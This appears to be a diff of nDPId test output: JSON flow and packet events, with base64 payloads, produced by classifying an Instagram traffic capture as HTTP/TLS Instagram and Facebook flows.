-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1436720900876,"pkt":"ABsv8H60QPMIw47hCABFAABQv9ZAAEAGTLPAqABnUlUauq1bAFCj1oJNfMxlZ\/AQEUsuYQAAAQEICgAD64RUYwVLAQEFGnzMtFt8zLnlfMypR3zMrtF8zJKnfMyYMQ=="} -00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901182,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720901182,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/BAAEAGs3DAqABnTUMdEYS4AFDrYaSj8+woZ4AQH+origAAAQEICgAD66NkobAz"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/FAAEAGs2\/AqABnTUMdEYS4AFDrYaSj8+wze4AQH+origAAAQEICgAD66NkobA0"} 
-02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1436720901183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720901183,"pkt":"QPMIw47hABsv8H60CABFAAW+nH9AADkGdFdNQx0RwKgAZwBQhLjz7DN762Gko4AQAq9DyQAAAQEICmShsDQAA+ufWEdJBRPnaSmosKHYDmQEyGHV3GAwTrGe5kQxyGEYyxmyELBrJc+SMi3dmmwq1mAYjd9asgZG6SWIbmuecSeibLvJUKPOw0JlNLd+SsFoR4AyWWZMuWzjy22t8lg9nL1yby0j7G5yGHP2UfvrthqhUQLZPhRPRii5ZImLbbxtBh75Nwi10QstpiiOURwgsk\/gse0fhODW3xEaIlCTuwGMxEsajO6KBwgVZE4oD8EZJ8CUI+IftidbAnEAzCB+CxiXeSUkT7I4PLvoy1NnMNCUuGI63ybZNQBpkMtmgmFlmfthxhK9DguCw4XPNprshLbUVoAbHdBaG0WibQPaUDoawN0QnEMFu5OOsEXu+c3ydgozRy0R9FbV0F8hsoSyHLIicGyGMakQqAYSTks8J\/2+\/kORfizOWuAtMcMCSaUPfEY6f\/ttodWXWPLX7bzs5o8i2FH5IZ4wLEpEOhwV2MADYJIWDBmF9CQdn6hh1kzmvWM7b4SuFg+iI0QmrTgRgMl\/rAMZDtwdyKQyk+DPksJTgtrhZZRA\/GY+X2oyKfiboDY0NouOzUthrGCw4ToWxqMKM+rf1sDDAEsjSzJB7rCfcDOwibANVH23SwWhh5rFCY04ksXdhurOKpIBQXzCwN2yHF8S1j2hc2z0kMsCW+OeS+e5HaaRoyzZaCzPNrgnwkhY7i8yZQkeMkH4woSzgHZw7AMoJTs5nD21BiRDuFCBqB4lGX+kk55UTfE62aMJ9jBPBhqltnyYDTEarQKEsWGbVjV7cRHRc\/JgmbZkQlW0YI\/xZdFg6wN2R+J3fOBbBmIcOvB5bIKiWTEFFXRESk7pA\/G3UwXXKB8XDGTJIAkPv49GZuMRZBkC+FhZzCzZ\/iYJh8LIJjV10uzY7Q6E8RpFbyee3Ru25UC5ETbDsFPCaR1ZZC+Qlrsu3Z2QOnm5Ijct96wHLCiQoCUx5CFCGTynRCNjadMyB8tlLRKCwv7KX++dvy1I4Ngs+X8bALTsRQ81XIDydJihBYicmO+O5EykyOu25b+jIYCOXX2WfISuvyX8JiI2GJxqYZEg+OZPoDhxBrn8TYtguClNRehGIQDtqZcwjb\/V86w0sQMOHMZzpnYBjpA8i2eJoGlmik3CQHHMRm8DxLkyFvCZWDFGTUEVI6mHEnfCoaSoN+\/pJIKAlCT4XxDOVC6F8g19jfq1eEJAj0k3u3yFtEJC0DXJolurtJkzJ6y5KHJWSGujZ7ucFS0YjpIoSX0blPAySPJvg33fP2OLma7cQ\/o6PyUHgctick8cobWRNWzIJG3koi8vkKbBIHEMIhdatBUZ40kmN4wtVBz4xoAKljf4v6tXAUt\/sabl0bLkuRE5KikyGgBCbojsrcdwSEGEBomIUFpEl4TvPOqQ8EQF08if3O9FnhnUw2jwQHpaPsw+3EzgNs0zWy6OB623FWGwH7yRctwfDWnw6uSz7AvbHpmHBs+lzanaBkBBq2DLF24dyAfJ1fyW2F8GD9sWLVnjCGZF3
EsLst8bQIxxKOwYkoOS2WRsw0xVMJlnywe3Dcc8w+9gQNiBfxyDpYA\/BXzFgEQ3SDtI\/Iov2XBZk1lmPY59tj\/SH+23V5dy\/iiOkLW8UdeiSozNTMFJIdoa309Kn34h+DTnlxZPJVqKRj7du3Uk37CetFC6vFxS2151HHC6aWXemK7B3BpAILjJ\/RL8v0ZA5dOz14w3bAaJWBEg+oUMkesS4WzNnMtGFzWDqZOmcWARMZvW5QUXehDRGok1aYS2VUwcI4nRFkmR4HYk3YsQQ7hbSjts4wBuESi5cIWAPkICk+lgVslThZsIux2ZS+mHik4DwoYI7IF8QlYXTsSiw2By7i5s7AeQhpAzljeQfkQaQPQMK5P3IVCAQHZWMgI="} -00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1436720901262,"pkt":"ABsv8H60QPMIw47hCABFAAE2VBZAAEAGt67AqABnUlUamZHmAFCdoJYSxR9Z0oAYDfbnvwAAAQEICgAD66tZ6cc2R0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMjQ4ODI5Xzg1Mzc4MjEyMTM3Mzk3Nl85MDk5MzY5MzRfbi5qcGc\/c2U9NyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWEuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898354,"flow_last_seen":1436720898354,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720898354,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436720898354,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898354,"pkt":"ABsv8H60QPMIw47hCABFAAA8TypAAEAGEYLAqABnrfxrBNw+AbsehKWiAAAAAKACOQjaPgAAAgQFtAQCCAoAA+qIAAAAAAEDAwY="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7560000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1436720898386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1431,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1431,"pkt_l4_len":1397,"thread_ts_msec":1436720898386,"pkt":"ABsv8H60QPMIw47hCABFAAWJa5BAAEAGjI7AqABnHw1dNISQAbuIwY4ypNSTmIAYARMTGgAAAQEICgAD6otaUmp7FwMBBVB9SXVyqGN\/Z0IQOrRWeDqy2ESAojaAx4QQZK8Nvn9P2WG4BrAo87sybB9iQ6L07zu3SJx\/yEENym+6oXOIueLurovz4xM5H+e2VkXRxNwq2D0zbcPaARfl1kqZ5lxozT2KxP5upnv5ZlZknUeHJ9iJUeI933878+9Wa2p3jAkSn4v+PhMZ8tdKr\/DbC4Dao9UoiB0NXUAr3Yz5mLZxqwvhp7T5JBYmrpug0k+c+c5jewd+5zMMLlTOh9zrkFpN\/SPdxljY89SWMG4iWok6qAWd81044WQFB8MMk6d1YEgnl4MTRR4s5nra0RAZ\/18nINKDy\/+7OtbIdykHRTDGdkzNglojGhlbMwXwCoSaU7eaC\/UG3QHuANJheRiTxBbb9LObDO61gFXBkdpo\/nFCQJ5DEAR9LRi5VbgUevhOk8v2CnW3NfU8tU\/NhXT2Fwav0PyuAxlku4R0TFjGrX0lMbSi5TfJsyWyqS9JUaHL9+9Lo2MolHMixycuQJ8OBJfxMjbh4vndGe6E5xjywRDhon5Ivpm51kbX7pr85erPPQ5esyd11\/S2GN1nyosTrQfKPFTMJ2PKe2m7QTQt+uAz\/lbUTHbMP5WXngggI0bC1v64BOTbVZvk5uSBRBJTxfNNwpu5Mu42yT2kpORmWxKLjzXxHI3WY0zq00CLVkZ1W4ZdSNXs14xkPKnh8GETvWNyrC0OkJAC\/senhsF4RXOoqIV\/fvDhI7Lz\/aB3VqgZGkZTiT2tG0nkNbTl36TNhCL0NMIpdEkg3CtkeHnRpYXxlFUaqjl0oiNlqmXrT3txeOlkpgLeE8sil6hQeUXLUDxeB\/KJ3hVWQV57tvquoi3TQ0mdlDPh3nKxwFekfGvexzie5JWVEiecROjBicDHlMGZSqgfGOOL9obBhKFQKyGkKwqvDD0GLpn+uVlqpq4HgYehGmZsXkGfKjhOvgYnCN46aHecrF2yix3uKy9HcGVhEh0jdkP6ZVKeYPjfh1VormnzwC798pJrA6FXeukKkQhENaxtIfjtfZqrhxgkGn44Wi6ohn6pe\/FHHmbNcPgV6V8fsqp75GNTcdW4payqjcXiRcbHyE8T1\/Qx4baiJDp6KLsZS4gAneRh+ALhxukKM03jbRUClXAh8oRiLl0u+SOlflfwh8goOCkzbht0yzBBd5s+YE\/rKLvLODamT6vRSajD988ioyLCTi6O7PjCpIz0x86CPfl59RFLMWfW1DDNxLLiQpG5QmdGA\/0xKZPtgucNxJfMg8zisuAsBotSOZNTt7iyYW\/IMjbjZfUDk2XnW0FMevjvN1dNSzxncEScDgEwhOZR\/bPFjnmrDfWVV5x9BRHI5MP8wUwSlhypizc+qxTGIgicImjYGkhAIz+xcFmXadM0YNZEvMZaj9aBOHMX1Oble6EYxmSHOrpQKqfzbWeMlvwrQYuci0kLy\/\/bshVduwlDBy5JYqDunQnZyDGNhNVfyaH+ng8KQ6sBqINnITFXfA
nCkwXV\/HK1iUkb7QzoqBn3gpftCp83hNH0foudA8Gdf6kurlWwgMEOXi5BfTqlD4DwASXt9A68u1P9Zz8s0alrX2UlusB6fvL9Q9Js6MLwiQyj+bjdEcQ3Uplwrw6qLdouhHzsdgkMnVdwc2l5wv8KPOcXqmQvqjndZFz1nXaAVhwsFoo1zwY3LiNiYjhwWSYaeCHLdPVBHtAjW1OZFou+zyYe9X36AFhBBqrW+04QrWGvIhn1jD27wWhOa1bAC4ScjrpH0lKPe5njeedOXaKkZFE++EHilCzyFRBq6mDF3sb10u4yUIsQcfD4LLSh"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1436720898475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898475,"pkt":"QPMIw47hABsv8H60CABFAAA05iNAAFUGAlAfDV00wKgAZwG7hJCk1JOYiMGTh4AQAE5t9QAAAQEIClpSq0YAA+qL"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1436720898499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898499,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAAFIGTqyt\/GsEwKgAZwG73D5XFMWUHoSlo6ASOJBK1AAAAgQFlgQCCAq8TYT0AAPqiAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1436720898499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898499,"pkt":"ABsv8H60QPMIw47hCABFAAA0TytAAEAGEYnAqABnrfxrBNw+AbsehKWjVxTFlYAQAOXaNgAAAQEICgAD6pe8TYT0"} 
+00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1436720898551,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720898551,"pkt":"QPMIw47hABsv8H60CABFAAKZ5iRAAFUG\/+kfDV00wKgAZwG7hJCk1JOYiMGTh4AYAE6DfwAAAQEIClpSq5UAA+qLFwMBAmB3TNLiDxMdaG\/77FJR8O6B7ETM5PL1YEwRicjM0iP0UHaAjwUM69tZJRboKPSJSylQ1372woiRMUoGT0dkqivXwS77nykGpDpQxH2zG\/qLmXj10Apbm9mNJzojbuGkVAQeXciVaLovJfxV8pe4ApuOMtqX+wzNa0ZzIxrRfdGy1r+REoc96\/duttzeccU7r8F+0sSj4kAMBptpjPxHIWmQ8bvcQmsOZTBbtWqbInBydwnOzZKHuUG4UpWsNoKQLrxSa1ETAsjugoyEe5PPT8+cb8Irh4mKsNfbStX5KDjpe9Dme8aKUCL1ceYHHjALeMY9l4fx2o0KIF6TukGkzvqR8cZ+qcyDG5U\/HYh5lxYTcHS7lDXS1PzV6XOR41h1cZ9L+KxXE6JczRHCSiNT1VF7boI4Qizj5lEdfdajhSQHOEg16UAhsZHpgK1G5Iki1ek6rdWyUqwchJMZYUThaRdJpKv9RM0OW9cAtKW4cZKenq0TEdOPDEBRCwskRboA6Gi3YnhJ3qdvDGkTLGo9
t+FpkGczAZZn4gKC4xoEybQb10OFqFb4BP0BHlc1dmzqbYjWeEKW2wJjaNEaqdUvlusDaKzJPAfd\/FC3qcdqBy6RoP1rw6AWfXgFirXb5SF1IsZGaICO7Vi\/A05NBIj2TN+sAkrMTvlnJxzijI3OS4z\/O7pdS0yJ1AhdM2CbNqiTSP1\/fSWG2i895LYIERx7TAiABxyhh9ufac6WLn1D9wJV86snpuHfJEPWipx7pSJs20IjfVBIUe\/onrcoOjL6GotP95FotxVNOdpbLqczmpv1mQ=="} +01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1436720900684,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720900684,"pkt":"ABsv8H60QPMIw47hCABFAAE4wXBAAEAGQn\/AqABnLiFGoJegAFCP9SVkp0jV34AYH+olJAAAAQEICgAD63Ga3vWjR0VUIC9ocGhvdG9zLWFrLXhhcDEvdDUxLjI4ODUtMTUvZTM1LzEwODU5OTk0XzEwMDk0MzM3OTI0MzQ0NDdfMTYyNzY0NjA2Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtaC5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7560000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1436720900687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":319,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":319,"pkt_l4_len":285,"thread_ts_msec":1436720900687,"pkt":"ABsv8H60QPMIw47hCABFAAEx0CVAAEAGO5vAqABnUlUaouJQAFA6kgvvKZIczIAYH0cqkQAAAQEICgAD63FWCuc2R0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTE1LzExMzg2NTI0XzExMDI1NzYxOTMxNzQzMF8zNzk1MTM2NTRfbi5qcGcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1nLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBq